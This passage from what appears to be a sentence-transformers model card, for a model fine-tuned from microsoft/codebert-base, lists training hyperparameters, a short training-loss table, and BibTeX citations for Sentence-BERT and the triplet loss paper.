- overwrite_output_dir: False
- do_predict: False
- eval_strategy: no
- prediction_loss_only: True
- per_device_train_batch_size: 16
- per_device_eval_batch_size: 16
- per_gpu_train_batch_size: None
- per_gpu_eval_batch_size: None
- gradient_accumulation_steps: 1
- eval_accumulation_steps: None
- torch_empty_cache_steps: None
- learning_rate: 5e-05
- weight_decay: 0.0
- adam_beta1: 0.9
- adam_beta2: 0.999
- adam_epsilon: 1e-08
- max_grad_norm: 1
- num_train_epochs: 1
- max_steps: -1
- lr_scheduler_type: linear
- lr_scheduler_kwargs: {}
- warmup_ratio: 0.0
- warmup_steps: 0
- log_level: passive
- log_level_replica: warning
- log_on_each_node: True
- logging_nan_inf_filter: True
- save_safetensors: True
- save_on_each_node: False
- save_only_model: False
- restore_callback_states_from_checkpoint: False
- no_cuda: False
- use_cpu: False
- use_mps_device: False
- seed: 42
- data_seed: None
- jit_mode_eval: False
- use_ipex: False
- bf16: False
- fp16: False
- fp16_opt_level: O1
- half_precision_backend: auto
- bf16_full_eval: False
- fp16_full_eval: False
- tf32: None
- local_rank: 0
- ddp_backend: None
- tpu_num_cores: None
- tpu_metrics_debug: False
- debug: []
- dataloader_drop_last: False
- dataloader_num_workers: 0
- dataloader_prefetch_factor: None
- past_index: -1
- disable_tqdm: False
- remove_unused_columns: True
- label_names: None
- load_best_model_at_end: False
- ignore_data_skip: False
- fsdp: []
- fsdp_min_num_params: 0
- fsdp_config: {'min_num_params': 0, 'xla': False, 'xla_fsdp_v2': False, 'xla_fsdp_grad_ckpt': False}
- fsdp_transformer_layer_cls_to_wrap: None
- accelerator_config: {'split_batches': False, 'dispatch_batches': None, 'even_batches': True, 'use_seedable_sampler': True, 'non_blocking': False, 'gradient_accumulation_kwargs': None}
- deepspeed: None
- label_smoothing_factor: 0.0
- optim: adamw_torch
- optim_args: None
- adafactor: False
- group_by_length: False
- length_column_name: length
- ddp_find_unused_parameters: None
- ddp_bucket_cap_mb: None
- ddp_broadcast_buffers: False
- dataloader_pin_memory: True
- dataloader_persistent_workers: False
- skip_memory_metrics: True
- use_legacy_prediction_loop: False
- push_to_hub: False
- resume_from_checkpoint: None
- hub_model_id: None
- hub_strategy: every_save
- hub_private_repo: None
- hub_always_push: False
- gradient_checkpointing: False
- gradient_checkpointing_kwargs: None
- include_inputs_for_metrics: False
- include_for_metrics: []
- eval_do_concat_batches: True
- fp16_backend: auto
- push_to_hub_model_id: None
- push_to_hub_organization: None
- mp_parameters:
- auto_find_batch_size: False
- full_determinism: False
- torchdynamo: None
- ray_scope: last
- ddp_timeout: 1800
- torch_compile: False
- torch_compile_backend: None
- torch_compile_mode: None
- include_tokens_per_second: False
- include_num_input_tokens_seen: False
- neftune_noise_alpha: None
- optim_target_modules: None
- batch_eval_metrics: False
- eval_on_start: False
- use_liger_kernel: False
- eval_use_gather_object: False
- average_tokens_across_devices: False
- prompts: None
- batch_sampler: batch_sampler
- multi_dataset_batch_sampler: round_robin

| Epoch | Step | Training Loss |
|---|---|---|
| 0.2393 | 500 | 0.1875 |
| 0.4787 | 1000 | 0.1815 |
| 0.7180 | 1500 | 0.24 |
| 0.9574 | 2000 | 0.1596 |
@inproceedings{reimers-2019-sentence-bert,
title = "Sentence-BERT: Sentence Embeddings using Siamese BERT-Networks",
author = "Reimers, Nils and Gurevych, Iryna",
booktitle = "Proceedings of the 2019 Conference on Empirical Methods in Natural Language Processing",
month = "11",
year = "2019",
publisher = "Association for Computational Linguistics",
url = "https://arxiv.org/abs/1908.10084",
}
@misc{hermans2017defense,
title={In Defense of the Triplet Loss for Person Re-Identification},
author={Alexander Hermans and Lucas Beyer and Bastian Leibe},
year={2017},
eprint={1703.07737},
archivePrefix={arXiv},
primaryClass={cs.CV}
}
Base model
microsoft/codebert-base